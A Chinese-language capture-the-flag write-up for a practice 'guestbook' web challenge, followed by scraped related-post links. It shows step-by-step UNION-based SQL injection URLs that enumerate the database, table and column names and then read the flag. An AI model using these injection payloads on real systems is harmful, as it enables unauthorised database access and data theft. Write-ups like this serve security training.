guestbook

题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入
点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息

在id值后加上" ’ "测试是否存在测试点网页报错说明存在注入点
union 注入
查看列

https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,3,4%20#
//id=-1 是让前面的内容不显示

3被回显

1.查看数据库名

https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,database(),4%20#


数据库的名字g8
2.查看表名

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#

发现有一个表 flag
3.测试表的字段

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#

仍然显示flag
4.读取flag

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#

得到flag

hackme guestbook相关推荐

  1. guestbook(hackme web部分writeup)

    题目链接 打开链接可以发现,是一个公告栏,可以自己提交标题和内容,然后会在网页上显示出来. 网页源代码肯定啥也没有,抓包也是没有有用的信息,我们考虑flag在服务器的数据库内,所以我们就想到用sql注 ...

  2. Hackme Writeup

    https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I'm so close to you but ...

  3. web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)

    web做题笔记 文章目录 web做题笔记 buuoj easy_tornado 随便注 warmup easysql 高明的黑客 jarvisoj re? flag在管理员手上 api调用 chopp ...

  4. 开源 java CMS - FreeCMS2.8 数据对象 guestbook

    2019独角兽企业重金招聘Python工程师标准>>> 项目地址:http://www.freeteam.cn/ ​​​​​​​guestbook 在使用留言相关标签时,标签会封装g ...

  5. hackme Guess-the-Number 寒假逆向生涯(4/100)

    hackme 声明 简单题目,没必要查壳,动调. 话不多说,上核心伪代码 大致思路: 一个for循环,外加一个while循环 while循环是找出相应条件下v12的值 for循环作用: 1.制造whi ...

  6. 织梦guestbook.php漏洞,DEDE:织梦漏洞修复(含任意文件上传漏洞与注入漏洞)

    这几天阿里频繁提醒网站有漏洞,搞得我不胜其烦,好吧,我修复还不行吗?搜索之后整理如下,仅供参考(5.7以上版本适用): 任意文件上传漏洞修复 一./include/dialog/select_soft ...

  7. YAML基础知识及搭建一台简洁版guestbook

    一,前言 前面我们已经搭建过简易版k8s集群了,在此基础上可以搭建一个简洁版guestbook ,以便来学习k8s创建pod的整个过程. 二,在此之前,我们还需要学习一下YAML基础知识 YAML 基 ...

  8. 织梦留言板guestbook.htm加入头部导航

    织梦仿站的时候如果有留言板,通常都是不像织梦这样的留言板独立的页面:都是带头部导航的.那么如何在guestbook.htm加入头部导航:如果直接加入head.htm的话.标签在这里是无法调用的:我们必 ...

  9. 华为云云容器快速搭建网站实践随记—利用私有镜像搭建GuestBook

    一.华为云云容器简单介绍: 云容器引擎 CCE 是基于 K8S 和 Docker 的企业级容器服务,为企业应用提供快速部署.自动化运维.弹性伸缩等容器生命周期管理能力. 这个实践是通过 docker ...

最新文章

  1. Session原理、安全以及最基本的Express和Redis实现
  2. 华为手机获取状态栏高度是错误的_华为后置指纹这么多功能,你不会还以为只能解锁和支付吧...
  3. ORA-20000 exec dbms_space 错误
  4. 如何安装Windows操作系统?(二)安装启动项杂谈
  5. vba fso读utf 文本_利用FSO对象操作文件
  6. 参考文献_参考文献:
  7. .NET Core开发日志——OData
  8. MVC原理及案例分析
  9. c语言课设报告时钟vc环境,C语言课程设计报告模拟时钟转动程序
  10. 一些不错的计算机书籍
  11. 【Linux】Linux测试磁盘 IO 性能
  12. 覆写Activity的finish()方法
  13. linux启动找不到内核,linux – PXE启动 – 在TFTP服务器上找不到内核
  14. 【等价变换】—— 指数对数函数
  15. 项目常用工具类整理(二)--ckeditor的引用
  16. C++数据库编程 ODBC查询数据
  17. VS插件AnkhSVN的安装,设置和使用
  18. vue项目的停止_Terminal怎么停止VUE项目
  19. 三级联动的数据库(贼多)
  20. 李瑞霖4.13黄金走势短线放空原油能否筑底反弹?行情涨跌分析

热门文章

  1. clickhouse authentication failed
  2. vue2.x生命周期以及keep-alive
  3. glViewport
  4. 在网页中打开pdf文件
  5. 使用WINIO进行驱动层的键盘记录
  6. 超级终端与串口调试助手
  7. SQL-在Update中进行子查询和左联查询
  8. python 将三维数据转为二维_python将三维数组展开成二维数组的实现
  9. java之三元运算符_Java三元运算符
  10. 海南省澄迈县谷歌卫星地图下载